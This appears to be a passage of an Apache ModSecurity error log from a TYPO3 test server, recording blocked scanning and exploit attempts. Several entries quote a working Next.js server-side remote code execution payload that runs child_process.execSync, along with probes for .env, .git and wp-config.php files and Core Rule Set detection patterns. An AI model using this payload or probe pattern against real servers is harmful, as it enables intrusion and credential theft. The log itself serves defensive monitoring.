[Thu Mar 19 07:04:00.838247 2026] [:error] [pid 2796384] [client 85.11.167.19:50936] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1773900240_5825',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0EW_tHBMavcYc3_KjgAAAAU"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:00.838389 2026] [:error] [pid 2796384] [client 85.11.167.19:50936] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1773900240_5825',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0EW_tHBMavcYc3_KjgAAAAU"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:00.838921 2026] [:error] [pid 2796384] [client 85.11.167.19:50936] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1773900240_5825 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0EW_tHBMavcYc3_KjgAAAAU"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:00.839657 2026] [:error] [pid 2796384] [client 85.11.167.19:50936] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0EW_tHBMavcYc3_KjgAAAAU"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:00.839784 2026] [:error] [pid 2796384] [client 85.11.167.19:50936] [client 85.11.167.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0EW_tHBMavcYc3_KjgAAAAU"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:01.037798 2026] [:error] [pid 2796385] [client 85.11.167.19:53486] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1773900240',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0cNdoZmFqjS4NtnqmwAAAAw"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:01.037892 2026] [:error] [pid 2796385] [client 85.11.167.19:53486] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1773900240',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0cNdoZmFqjS4NtnqmwAAAAw"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:01.037950 2026] [:error] [pid 2796385] [client 85.11.167.19:53486] [client 85.11.167.19] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1773900240 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0cNdoZmFqjS4NtnqmwAAAAw"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:01.038675 2026] [:error] [pid 2796385] [client 85.11.167.19:53486] [client 85.11.167.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0cNdoZmFqjS4NtnqmwAAAAw"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 07:04:01.038800 2026] [:error] [pid 2796385] [client 85.11.167.19:53486] [client 85.11.167.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abuR0cNdoZmFqjS4NtnqmwAAAAw"], referer: https://surf.test.indacotrentino.com
[Thu Mar 19 09:35:54.623933 2026] [authz_core:error] [pid 2793941] [client 195.178.110.159:47550] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Mar 19 11:18:34.964887 2026] [:error] [pid 2793992] [client 204.76.203.25:44590] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abvNetX9IGRa3-Enz2e7iwAAAAs"]
[Thu Mar 19 11:18:34.965134 2026] [:error] [pid 2793992] [client 204.76.203.25:44590] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abvNetX9IGRa3-Enz2e7iwAAAAs"]
[Thu Mar 19 11:18:34.965290 2026] [:error] [pid 2793992] [client 204.76.203.25:44590] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abvNetX9IGRa3-Enz2e7iwAAAAs"]
[Fri Mar 20 02:03:54.968785 2026] [authz_core:error] [pid 2813264] [client 18.212.30.117:36112] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 05:21:44.250334 2026] [:error] [pid 2815709] [client 93.123.109.214:35328] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abzLWEGu3yPOFBRkxZtwjAAAAAA"]
[Fri Mar 20 05:21:44.250557 2026] [:error] [pid 2815709] [client 93.123.109.214:35328] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abzLWEGu3yPOFBRkxZtwjAAAAAA"]
[Fri Mar 20 05:21:44.250699 2026] [:error] [pid 2815709] [client 93.123.109.214:35328] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abzLWEGu3yPOFBRkxZtwjAAAAAA"]
[Fri Mar 20 05:21:44.368908 2026] [:error] [pid 2815711] [client 93.123.109.214:35342] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abzLWPy1_WiwY9KfWu_4HwAAAAI"]
[Fri Mar 20 05:21:44.369085 2026] [:error] [pid 2815711] [client 93.123.109.214:35342] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abzLWPy1_WiwY9KfWu_4HwAAAAI"]
[Fri Mar 20 05:21:44.369210 2026] [:error] [pid 2815711] [client 93.123.109.214:35342] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abzLWPy1_WiwY9KfWu_4HwAAAAI"]
[Fri Mar 20 05:21:44.390978 2026] [authz_core:error] [pid 2815711] [client 93.123.109.214:35342] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Mar 20 05:21:44.435532 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abzLWLDLwCKZPBqri3XZswAAAAc"]
[Fri Mar 20 05:21:44.435743 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abzLWLDLwCKZPBqri3XZswAAAAc"]
[Fri Mar 20 05:21:44.435888 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abzLWLDLwCKZPBqri3XZswAAAAc"]
[Fri Mar 20 05:21:44.480633 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abzLWLDLwCKZPBqri3XZtAAAAAc"]
[Fri Mar 20 05:21:44.480811 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abzLWLDLwCKZPBqri3XZtAAAAAc"]
[Fri Mar 20 05:21:44.480952 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abzLWLDLwCKZPBqri3XZtAAAAAc"]
[Fri Mar 20 05:21:44.516153 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abzLWLDLwCKZPBqri3XZtQAAAAc"]
[Fri Mar 20 05:21:44.516328 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abzLWLDLwCKZPBqri3XZtQAAAAc"]
[Fri Mar 20 05:21:44.516466 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abzLWLDLwCKZPBqri3XZtQAAAAc"]
[Fri Mar 20 05:21:44.537203 2026] [authz_core:error] [pid 2817637] [client 93.123.109.214:35380] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 05:21:44.563594 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abzLWLDLwCKZPBqri3XZtwAAAAc"]
[Fri Mar 20 05:21:44.563756 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abzLWLDLwCKZPBqri3XZtwAAAAc"]
[Fri Mar 20 05:21:44.563898 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abzLWLDLwCKZPBqri3XZtwAAAAc"]
[Fri Mar 20 05:21:44.585531 2026] [:error] [pid 2817637] [client 93.123.109.214:35380] [client 93.123.109.214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag 